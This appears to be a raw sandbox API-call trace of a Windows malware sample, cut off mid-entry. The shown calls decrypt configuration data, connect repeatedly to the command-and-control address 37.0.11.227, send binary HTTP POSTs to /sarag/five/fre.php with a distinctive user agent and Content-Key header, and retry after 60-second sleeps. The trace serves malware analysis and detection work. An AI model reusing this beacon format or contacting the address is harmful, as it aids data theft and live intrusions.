[0240.009] GetProcessHeap () returned 0x690000 [0240.009] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0240.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.010] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0240.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.011] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0240.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.012] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0240.013] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.014] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0240.014] GetProcessHeap () returned 0x690000 [0240.014] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0240.014] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0240.014] GetProcessHeap () returned 0x690000 [0240.014] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0240.014] socket (af=2, type=1, protocol=6) returned 0x64c [0240.014] connect (s=0x64c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0240.045] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0240.045] GetProcessHeap () returned 0x690000 [0240.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0240.045] GetProcessHeap () returned 0x690000 [0240.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b77b0 [0240.046] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0240.047] wvsprintfA (in: param_1=0x6b77b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0240.047] GetProcessHeap () returned 0x690000 [0240.047] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0240.047] GetProcessHeap () returned 0x690000 [0240.047] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0240.047] GetProcessHeap () returned 0x690000 [0240.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0240.048] GetProcessHeap () returned 0x690000 [0240.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b77b0 [0240.048] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0240.049] wvsprintfA (in: param_1=0x6b77b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0240.049] GetProcessHeap () returned 0x690000 [0240.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0240.049] GetProcessHeap () returned 0x690000 [0240.050] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0240.050] send (s=0x64c, buf=0x6ad508*, len=242, flags=0) returned 242 [0240.050] send (s=0x64c, buf=0x6aba40*, len=159, flags=0) returned 159 [0240.051] GetProcessHeap () returned 0x690000 [0240.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0240.051] recv (in: s=0x64c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0240.130] GetProcessHeap () returned 0x690000 [0240.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0240.131] GetProcessHeap () returned 0x690000 [0240.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0240.131] GetProcessHeap () returned 0x690000 [0240.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0240.132] GetProcessHeap () returned 0x690000 [0240.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0240.133] closesocket (s=0x64c) returned 0 [0240.133] GetProcessHeap () returned 0x690000 [0240.133] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0240.133] GetProcessHeap () returned 0x690000 [0240.133] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0240.134] GetProcessHeap () returned 0x690000 [0240.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0240.134] GetProcessHeap () returned 0x690000 [0240.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0240.134] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x131c) returned 0x64c [0240.136] Sleep (dwMilliseconds=0xea60) [0240.139] GetProcessHeap () returned 0x690000 [0240.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0240.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.140] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0240.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.152] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0240.162] GetProcessHeap () returned 0x690000 [0240.162] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0240.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.163] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0240.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.164] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0240.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.166] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0240.166] GetProcessHeap () returned 0x690000 [0240.166] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0240.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.171] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0240.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.172] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0240.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.177] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0240.177] GetProcessHeap () returned 0x690000 [0240.177] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0240.177] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.178] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0240.178] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.179] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0240.179] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.180] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0240.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.180] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0240.180] GetProcessHeap () returned 0x690000 [0240.180] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0240.180] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0240.181] GetProcessHeap () returned 0x690000 [0240.181] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0240.181] GetProcessHeap () returned 0x690000 [0240.181] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0240.181] GetProcessHeap () returned 0x690000 [0240.182] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0240.182] GetProcessHeap () returned 0x690000 [0240.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0240.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.184] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0240.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.193] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0240.198] GetProcessHeap () returned 0x690000 [0240.199] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0240.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.200] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0240.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.200] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0240.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.203] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0240.203] GetProcessHeap () returned 0x690000 [0240.203] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0240.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.205] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0240.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.205] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0240.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.206] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0240.206] GetProcessHeap () returned 0x690000 [0240.206] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0240.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.207] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0240.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.208] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0240.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.209] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0240.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.210] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0240.210] GetProcessHeap () returned 0x690000 [0240.210] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0240.210] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0240.210] GetProcessHeap () returned 0x690000 [0240.210] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0240.210] socket (af=2, type=1, protocol=6) returned 0x650 [0240.210] connect (s=0x650, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0240.233] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0240.233] GetProcessHeap () returned 0x690000 [0240.233] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0240.233] GetProcessHeap () returned 0x690000 [0240.233] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b77b0 [0240.233] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0240.236] wvsprintfA (in: param_1=0x6b77b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0240.236] GetProcessHeap () returned 0x690000 [0240.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0240.236] GetProcessHeap () returned 0x690000 [0240.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0240.237] GetProcessHeap () returned 0x690000 [0240.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0240.237] GetProcessHeap () returned 0x690000 [0240.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b77b0 [0240.237] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0240.238] wvsprintfA (in: param_1=0x6b77b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0240.238] GetProcessHeap () returned 0x690000 [0240.238] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0240.238] GetProcessHeap () returned 0x690000 [0240.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0240.239] send (s=0x650, buf=0x6ad508*, len=242, flags=0) returned 242 [0240.239] send (s=0x650, buf=0x6aba40*, len=159, flags=0) returned 159 [0240.239] GetProcessHeap () returned 0x690000 [0240.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0240.239] recv (in: s=0x650, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0240.335] GetProcessHeap () returned 0x690000 [0240.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0240.336] GetProcessHeap () returned 0x690000 [0240.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0240.336] GetProcessHeap () returned 0x690000 [0240.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0240.337] GetProcessHeap () returned 0x690000 [0240.337] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0240.337] closesocket (s=0x650) returned 0 [0240.338] GetProcessHeap () returned 0x690000 [0240.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0240.338] GetProcessHeap () returned 0x690000 [0240.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0240.338] GetProcessHeap () returned 0x690000 [0240.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0240.338] GetProcessHeap () returned 0x690000 [0240.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0240.339] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x4d0) returned 0x650 [0240.340] Sleep (dwMilliseconds=0xea60) [0240.342] GetProcessHeap () returned 0x690000 [0240.342] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0240.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.344] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0240.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.350] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0240.361] GetProcessHeap () returned 0x690000 [0240.361] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0240.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.371] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0240.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.372] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0240.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.374] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0240.374] GetProcessHeap () returned 0x690000 [0240.374] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0240.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.376] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0240.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.376] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0240.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.377] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0240.377] GetProcessHeap () returned 0x690000 [0240.377] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0240.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.378] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0240.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.379] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0240.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.380] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0240.381] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.381] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0240.381] GetProcessHeap () returned 0x690000 [0240.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0240.381] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0240.382] GetProcessHeap () returned 0x690000 [0240.382] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0240.382] GetProcessHeap () returned 0x690000 [0240.395] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0240.398] GetProcessHeap () returned 0x690000 [0240.399] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0240.399] GetProcessHeap () returned 0x690000 [0240.399] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0240.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.401] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0240.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.419] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0240.630] GetProcessHeap () returned 0x690000 [0240.630] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0240.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.632] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0240.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.636] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0240.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.638] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0240.638] GetProcessHeap () returned 0x690000 [0240.638] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0240.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.640] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0240.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.641] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0240.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.642] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0240.642] GetProcessHeap () returned 0x690000 [0240.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0240.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.644] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0240.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.645] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0240.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.647] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0240.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0240.648] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0240.648] GetProcessHeap () returned 0x690000 [0240.648] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0240.648] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, 